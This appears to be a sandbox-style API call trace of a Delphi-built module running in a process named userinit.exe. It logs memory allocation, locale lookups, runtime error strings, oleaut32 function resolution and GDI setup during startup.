[0109.872] GlobalReAlloc (hMem=0x58000c, dwBytes=0x100000, uFlags=0x2) returned 0x58000c
[0109.943] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.944] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.944] GlobalUnlock (hMem=0x58000c) returned 0
[0109.944] GlobalReAlloc (hMem=0x58000c, dwBytes=0x102000, uFlags=0x2) returned 0x58000c
[0109.966] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.967] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.967] GlobalUnlock (hMem=0x58000c) returned 0
[0109.967] GlobalReAlloc (hMem=0x58000c, dwBytes=0x104000, uFlags=0x2) returned 0x58000c
[0110.036] GlobalLock (hMem=0x58000c) returned 0xe50020
[0110.037] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0110.037] GlobalUnlock (hMem=0x58000c) returned 0
[0110.037] GlobalReAlloc (hMem=0x58000c, dwBytes=0x106000, uFlags=0x2) returned 0x58000c
[0110.059] GlobalLock (hMem=0x58000c) returned 0x2720020
[0110.060] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0110.060] GlobalUnlock (hMem=0x58000c) returned 0
[0110.060] GlobalReAlloc (hMem=0x58000c, dwBytes=0x108000, uFlags=0x2) returned 0x58000c
[0110.129] GlobalLock (hMem=0x58000c) returned 0xe50020
[0110.130] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0110.130] GlobalUnlock (hMem=0x58000c) returned 0
[0110.130] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10a000, uFlags=0x2) returned 0x58000c
[0110.153] GlobalLock (hMem=0x58000c) returned 0x2720020
[0110.154] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0110.154] GlobalUnlock (hMem=0x58000c) returned 0
[0110.154] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10c000, uFlags=0x2) returned 0x58000c
[0110.224] GlobalLock (hMem=0x58000c) returned 0xe50020
[0110.225] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2720000
[0110.225] VirtualAlloc (lpAddress=0x2720000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2720000
[0110.315] GetKeyboardType (nTypeFlag=0) returned 4
[0110.316] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.316] GetStartupInfoA (in: lpStartupInfo=0x24f5c8 | out: lpStartupInfo=0x24f5c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0110.316] GetVersion () returned 0x1db10106
[0110.316] GetVersion () returned 0x1db10106
[0110.316] GetCurrentThreadId () returned 0xfa0
[0110.316] GetModuleFileNameA (in: hModule=0x2830000, lpFilename=0x24f0c4, nSize=0x105 | out: lpFilename="\xd4\xf0\x24" (normalized: "c:\\windows\\system32\\ôð$")) returned 0x0
[0110.316] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24ef9f, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.316] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f0b4 | out: phkResult=0x24f0b4*=0x0) returned 0x2
[0110.316] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f0b4 | out: phkResult=0x24f0b4*=0x0) returned 0x2
[0110.316] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f0b4 | out: phkResult=0x24f0b4*=0x0) returned 0x2
[0110.316] lstrcpynA (in: lpString1=0x24ef9f, lpString2="\xd4\xf0\x24", iMaxLength=261 | out: lpString1="\xd4\xf0\x24") returned="\xd4\xf0\x24"
[0110.316] GetThreadLocale () returned 0x409
[0110.316] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x24f0af, cchData=5 | out: lpLCData="ENU") returned 4
[0110.316] lstrlenA (lpString="\xd4\xf0\x24") returned 3
[0110.316] LoadStringA (in: hInstance=0x2830000, uID=0xffc4, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0110.316] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x12dcc0
[0110.316] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2950000
[0110.318] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x12ecc0
[0110.319] VirtualAlloc (lpAddress=0x2950000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2950000
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffc3, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffc1, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffc2, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffd4, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffdd, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffd3, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffd0, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffd7, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffd6, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffe8, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffe9, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffea, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffe7, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffe5, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffe3, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffe2, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffe1, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffe0, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xffff, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfffe, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfffd, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfffc, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfffb, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfffa, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfff9, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfff8, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfff7, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0110.319] LoadStringA (in: hInstance=0x2830000, uID=0xfff6, lpBuffer=0x24f1e8, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0110.320] LoadStringA (in: hInstance=0x2830000, uID=0xfff4, lpBuffer=0x24f1d4, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0110.320] LoadStringA (in: hInstance=0x2830000, uID=0xffe4, lpBuffer=0x24f1d4, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0110.320] GetVersionExA (in: lpVersionInformation=0x24f56c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2830000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x83\x02·\"\x83\x02\x04ö$") | out: lpVersionInformation=0x24f56c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0110.320] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.320] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0110.320] GetThreadLocale () returned 0x409
[0110.320] GetThreadLocale () returned 0x409
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x24f444, cchData=256 | out: lpLCData="Jan") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x24f444, cchData=256 | out: lpLCData="January") returned 8
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x24f444, cchData=256 | out: lpLCData="Feb") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x24f444, cchData=256 | out: lpLCData="February") returned 9
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x24f444, cchData=256 | out: lpLCData="Mar") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x24f444, cchData=256 | out: lpLCData="March") returned 6
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x24f444, cchData=256 | out: lpLCData="Apr") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x24f444, cchData=256 | out: lpLCData="April") returned 6
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x24f444, cchData=256 | out: lpLCData="May") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x24f444, cchData=256 | out: lpLCData="May") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x24f444, cchData=256 | out: lpLCData="Jun") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x24f444, cchData=256 | out: lpLCData="June") returned 5
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x24f444, cchData=256 | out: lpLCData="Jul") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x24f444, cchData=256 | out: lpLCData="July") returned 5
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x24f444, cchData=256 | out: lpLCData="Aug") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x24f444, cchData=256 | out: lpLCData="August") returned 7
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x24f444, cchData=256 | out: lpLCData="Sep") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x24f444, cchData=256 | out: lpLCData="September") returned 10
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x24f444, cchData=256 | out: lpLCData="Oct") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x24f444, cchData=256 | out: lpLCData="October") returned 8
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x24f444, cchData=256 | out: lpLCData="Nov") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x24f444, cchData=256 | out: lpLCData="November") returned 9
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x24f444, cchData=256 | out: lpLCData="Dec") returned 4
[0110.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x24f444, cchData=256 | out: lpLCData="December") returned 9
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x24f444, cchData=256 | out: lpLCData="Sun") returned 4
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x24f444, cchData=256 | out: lpLCData="Sunday") returned 7
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x24f444, cchData=256 | out: lpLCData="Mon") returned 4
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x24f444, cchData=256 | out: lpLCData="Monday") returned 7
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x24f444, cchData=256 | out: lpLCData="Tue") returned 4
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x24f444, cchData=256 | out: lpLCData="Tuesday") returned 8
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x24f444, cchData=256 | out: lpLCData="Wed") returned 4
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x24f444, cchData=256 | out: lpLCData="Wednesday") returned 10
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x24f444, cchData=256 | out: lpLCData="Thu") returned 4
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x24f444, cchData=256 | out: lpLCData="Thursday") returned 9
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x24f444, cchData=256 | out: lpLCData="Fri") returned 4
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x24f444, cchData=256 | out: lpLCData="Friday") returned 7
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x24f444, cchData=256 | out: lpLCData="Sat") returned 4
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x24f444, cchData=256 | out: lpLCData="Saturday") returned 9
[0110.321] GetThreadLocale () returned 0x409
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="$") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="0") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="0") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x24f598, cchData=2 | out: lpLCData=",") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x24f598, cchData=2 | out: lpLCData=".") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="2") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x24f598, cchData=2 | out: lpLCData="/") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0110.321] GetThreadLocale () returned 0x409
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x24f46c, cchData=256 | out: lpLCData="1") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0110.321] GetThreadLocale () returned 0x409
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x24f46c, cchData=256 | out: lpLCData="1") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x24f598, cchData=2 | out: lpLCData=":") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="AM") returned 3
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="PM") returned 3
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="0") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="0") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x24f4a0, cchData=256 | out: lpLCData="0") returned 2
[0110.321] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x24f598, cchData=2 | out: lpLCData=",") returned 2
[0110.322] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0110.322] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0110.323] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0110.323] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0110.323] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0110.323] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0110.324] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0110.324] GetDC (hWnd=0x0) returned 0x1201087d
[0110.324] GetDeviceCaps (hdc=0x1201087d, index=90) returned 96
[0110.324] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.324] GetDC (hWnd=0x0) returned 0x1201087d
[0110.324] GetDeviceCaps (hdc=0x1201087d, index=104) returned 0
[0110.324] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.324] CreatePalette (plpal=0x24f1fc) returned 0xf080894
[0110.324] GetStockObject (i=7) returned 0x1b00017
[0110.324] GetStockObject (i=5) returned 0x1900015
[0110.324] GetStockObject (i=13) returned 0x18a002e
[0110.324] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0110.324] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0110.324] LoadStringA (in: hInstance=0x2830000, uID=0xff3d, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0110.324] LoadStringA (in: hInstance=0x2830000, uID=0xff3c, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0110.324] LoadStringA (in: hInstance=0x2830000, uID=0xff3b, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0110.324] LoadStringA (in: hInstance=0x2830000, uID=0xff3a, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0110.324] LoadStringA (in: hInstance=0x2830000, uID=0xff39, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff38, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff37, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff36, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff35, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff34, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff33, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff32, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff31, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff30, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff4f, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff4e, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff4d, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xff4c, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0110.325] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0110.325] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0110.325] GetCurrentThreadId () returned 0xfa0
[0110.325] GlobalAddAtomA (lpString="WndProcPtr0283000000000FA0") returned 0xc13e
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xfefc, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xfefb, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xfefa, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xfef9, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0110.325] LoadStringA (in: hInstance=0x2830000, uID=0xfef8, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xfef7, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xfef6, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xfef5, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xfef4, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xfef3, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xfef2, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xfef1, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xfef0, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff0f, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff0e, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff0d, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff0c, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff0b, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff0a, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff09, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff08, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff07, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff06, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
